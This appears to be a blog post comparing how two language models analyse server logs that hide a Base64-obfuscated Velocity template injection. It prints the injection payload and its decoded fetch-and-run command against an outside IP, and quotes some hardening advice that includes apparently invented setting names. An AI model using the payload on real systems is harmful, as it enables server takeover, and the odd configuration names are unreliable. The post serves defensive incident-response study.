DEV Community

Saranyo Deyasi
Saranyo Deyasi

Posted on

Decoding AI #1: Breaking LLMs with Obfuscated Log Malice (DeepSeek vs. Qwen)

The AI industry loves automated benchmarks. We hear about massive context windows, MMLU scores, and high-level coding capabilities every single day. But how do these frontier open-weight models actually perform when thrown into a chaotic, real-world scenario where data isn’t clean, formatting is strict, and a security incident is active?
Welcome to Decoding AI, a research series where we ditch the standardized tests and put today's top models through manual, adversarial, real-world gauntlets.
In our first evaluation, we are stepping into the shoes of a Tier 3 SOC Analyst to run The Obfuscated Log Malice Test. We are pinning DeepSeek V4 Flash against Qwen 3.6 to see which model can accurately spot, decode, and remediate a stealthy, multi-stage cyber threat hidden inside raw server traffic.

The Adversarial Gauntlet
Standard LLMs are great at analyzing clean Python or JavaScript files. They struggle significantly when payloads are embedded inside raw log architecture, multi-turn strings, or hidden behind basic encodings.
To test their limits, we presented both models with a dense text file containing 4 distinct inbound connection logs. Three were benign or typical authentication failures. The fourth contained an active exploitation attempt targeting a server-side framework, with its payload string completely obfuscated using a raw Base64 layer:

DATA="{\"template_id\":\"492\",\"engine\":\"velocity\",\"payload\":\"$class.inspect('java.lang.Runtime').getRuntime().exec($string.decodeBase64('Y3VybCAtcyBodHRwOi8vMTg1LjIyMC4xMDEuNS9zaGVsbC5zaCB8IGJhc2g='))\"}"

The Evaluation Criteria:

  • 1. Instruction Adherence: The model must skip all polite conversational introductions ("Here is your analysis...") and drop directly into a Markdown matrix table.
  • 2. Cryptographic Precision: The model must accurately extract and translate the Base64 string (Y3V...=) to reveal the exact command and malicious IP.
  • 3. Domain Classification: The model must correctly categorize the unique exploit style instead of defaulting to generic catch-all terms like SQL Injection.
  • 4. Actionable Remediation: The model must provide immediate, technical steps based on the fact that the log returned an HTTP 200 OK status code.

The Showdown: Raw Model Outputs
Contender 1: DeepSeek V4 Flash
Immediate blocking: Add a WAF rule to block requests containing Velocity template syntax ($class.inspect, $string.decodeBase64) in POST data, and restrict outbound HTTP access from the application server.

Patch & validate: Review the Velocity engine configuration to disable dangerous built‑in classes (java.lang.Runtime, java.lang.ProcessBuilder), and apply the latest security patches for the reporting endpoint.

Containment & forensics: Isolate the compromised server (10.0.4.12) immediately; capture memory and disk images for analysis, and check for any established reverse shells or scheduled tasks.

Contender 2: Qwen 3.6

Sandbox Velocity Rendering: Immediately restrict the Velocity runtime configuration by disabling RuntimeMetricsMerger, removing access to java.lang.Runtime/java.lang.ProcessBuilder via Uberspect, and enforcing RuntimeRuntimeClassSecurityVM to prevent dynamic class introspection.

Enforce Strict Input Sanitization: Deploy parameterized validation on template_id and payload fields to reject raw VTL directives ($class, $string, #set, #foreach) and block multi-stage obfuscation attempts before they reach the template engine.

**WAF & EDR Tuning: **Update application-layer WAF signatures to detect Velocity Expression Language payloads and pipe-based shell execution patterns, while configuring EDR to monitor for anomalous child processes spawned from the Java web server runtime.

Technical Deep-Dive: Who Won?
Both engines successfully bypassed the safety alignment layers, recognizing that analyzing a payload within an industrial SOC scenario is a defensive utility role. They both decoded the string with perfect accuracy, translating the hidden text into the core command: curl -s http://185.220.101.5/shell.sh | bash.

However, the execution strategies diverged massively.

  1. The Layout and Adherence Metric (Winner: DeepSeek) DeepSeek respected the prompt constraints flawlessly. It zeroed out conversational fluff and outputted a perfectly formatted, highly scannable Markdown matrix.

Qwen completely choked on the layout layer. It clumped headers together, stripped standard pipe separators, and lost structural integrity, rendering the initial table cells unreadable. If this LLM were serving as a backend parser feeding data directly to a React or Vue dashboard interface, Qwen's output would have completely crashed the UI component.

  1. Incident Response Triage vs. Engineering Remediations This is where the evaluation gets fascinating. Depending on your operational role, both models offer completely different values.

DeepSeek is a superior Incident Responder: DeepSeek recognized the critical detail that the target log returned an HTTP RES=200 response code. This means the exploitation attempt wasn't just a probe—it succeeded. DeepSeek immediately shifted to active triage containment protocols: network segmentation of host 10.0.4.12, memory imaging, and hunting for active reverse shells.

Qwen is a superior System Hardening Architect: While Qwen dropped the ball on layout, its core technical intelligence regarding Java framework code was breathtaking. Instead of generic advice, it listed specific runtime configurations for Apache Velocity—explicitly detailing the use of Uberspect property controls to strip the template renderer's capability to interact with low-level system binaries like java.lang.ProcessBuilder.

Final Verdict
For immediate production use inside a Security Operations Center where readability, formatting stability, and emergency triage priority matter most, DeepSeek V4 Flash claims a definitive victory.

However, do not count Qwen out; its ability to surface deep system configuration variables makes it an incredible asset for the long-term code-patching phase once the initial fires are put out.

What are your thoughts on how these open-weight models handle obfuscation? Stay tuned for tomorrow's entry in our "Decoding AI" directory, where we challenge multi-turn conversational jailbreaks!

Top comments (0)